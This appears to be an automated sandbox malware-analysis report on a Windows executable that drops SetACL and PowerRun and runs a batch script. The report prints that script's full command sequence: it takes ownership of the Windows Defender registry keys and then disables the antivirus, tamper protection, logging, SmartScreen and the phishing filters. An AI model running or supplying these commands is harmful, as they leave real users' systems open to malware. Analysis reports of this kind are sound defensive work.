Code function: 0_2_004056F8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056F8

Source: reg.exe

Process created: 67

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

Code function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040350F

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708B74C	4_2_00007FF69708B74C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69706E4B0	4_2_00007FF69706E4B0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970794BC	4_2_00007FF6970794BC
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69705A350	4_2_00007FF69705A350
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970313F0	4_2_00007FF6970313F0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69705BC40	4_2_00007FF69705BC40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697066B2A	4_2_00007FF697066B2A
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708C76C	4_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69703F650	4_2_00007FF69703F650
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708669C	4_2_00007FF69708669C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697089718	4_2_00007FF697089718
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697047580	4_2_00007FF697047580
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69706A630	4_2_00007FF69706A630
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69705E530	4_2_00007FF69705E530
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697068360	4_2_00007FF697068360
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69707F394	4_2_00007FF69707F394
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970463E0	4_2_00007FF6970463E0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697083410	4_2_00007FF697083410
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69706C250	4_2_00007FF69706C250
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69707C28F	4_2_00007FF69707C28F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708A31C	4_2_00007FF69708A31C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697084218	4_2_00007FF697084218
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708EF6C	4_2_00007FF69708EF6C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69708DFF0	4_2_00007FF69708DFF0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69707BFE8	4_2_00007FF69707BFE8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69707EF30	4_2_00007FF69707EF30
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697093C64	4_2_00007FF697093C64
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697057B10	4_2_00007FF697057B10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69707FB00	4_2_00007FF69707FB00
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69703CB20	4_2_00007FF69703CB20
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69703E9D0	4_2_00007FF69703E9D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69706F9C0	4_2_00007FF69706F9C0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF69707EA10	4_2_00007FF69707EA10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697031A30	4_2_00007FF697031A30
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708B74C	5_2_00007FF69708B74C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69706E4B0	5_2_00007FF69706E4B0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970794BC	5_2_00007FF6970794BC
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69705A350	5_2_00007FF69705A350
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970313F0	5_2_00007FF6970313F0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69707C28F	5_2_00007FF69707C28F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69705BC40	5_2_00007FF69705BC40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697066B2A	5_2_00007FF697066B2A
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708C76C	5_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69703F650	5_2_00007FF69703F650
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708669C	5_2_00007FF69708669C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697089718	5_2_00007FF697089718
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697047580	5_2_00007FF697047580
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69706A630	5_2_00007FF69706A630
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69705E530	5_2_00007FF69705E530
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697068360	5_2_00007FF697068360
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69707F394	5_2_00007FF69707F394
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970463E0	5_2_00007FF6970463E0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697083410	5_2_00007FF697083410
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69706C250	5_2_00007FF69706C250
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708A31C	5_2_00007FF69708A31C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697084218	5_2_00007FF697084218
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708EF6C	5_2_00007FF69708EF6C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69708DFF0	5_2_00007FF69708DFF0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69707BFE8	5_2_00007FF69707BFE8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69707EF30	5_2_00007FF69707EF30
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697093C64	5_2_00007FF697093C64
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697057B10	5_2_00007FF697057B10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69707FB00	5_2_00007FF69707FB00
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69703CB20	5_2_00007FF69703CB20
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69703E9D0	5_2_00007FF69703E9D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69706F9C0	5_2_00007FF69706F9C0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF69707EA10	5_2_00007FF69707EA10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697031A30	5_2_00007FF697031A30

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe 4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF69703AA20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF69703AC70 appears 185 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF697043F80 appears 232 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF697087998 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF697039CB0 appears 138 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF697039B00 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF697044170 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF6970394C0 appears 170 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: String function: 00007FF697039D20 appears 188 times

Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewin_version_csharp.exeF vs 3Dut8dFCwD.exe
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSetACL.exe. vs 3Dut8dFCwD.exe

Source: 3Dut8dFCwD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

Source: classification engine

Classification label: mal100.phis.evad.winEXE@145/7@0/0

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF69704BF60 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,

4_2_00007FF69704BF60

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Code function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040350F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697053FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,	4_2_00007FF697053FD8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697053D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,	4_2_00007FF697053D1B
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF697053A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,	4_2_00007FF697053A5E
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 4_2_00007FF6970442A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	4_2_00007FF6970442A0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697053FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,	5_2_00007FF697053FD8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697053D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,	5_2_00007FF697053D1B
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF697053A5E AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,	5_2_00007FF697053A5E
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Code function: 5_2_00007FF6970442A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF6970442A0

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

Code function: 0_2_004049A4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049A4

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe

Code function: 4_2_00007FF697044810 FindResourceW,LoadResource,LockResource,FreeResource,_invalid_parameter_noinfo_noreturn,

4_2_00007FF697044810

Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

File created: C:\Users\user\AppData\Local\Temp\nsm4D38.tmp

Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat

Source: 3Dut8dFCwD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3Dut8dFCwD.exe	ReversingLabs: Detection: 44%
Source: 3Dut8dFCwD.exe	Virustotal: Detection: 45%

Source: SetACL64.exe	String found in binary or memory: -help
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe	String found in binary or memory: -help
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.

Source: C:\Users\user\Desktop\3Dut8dFCwD.exe

File read: C:\Users\user\Desktop\3Dut8dFCwD.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\3Dut8dFCwD.exe "C:\Users\user\Desktop\3Dut8dFCwD.exe"
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
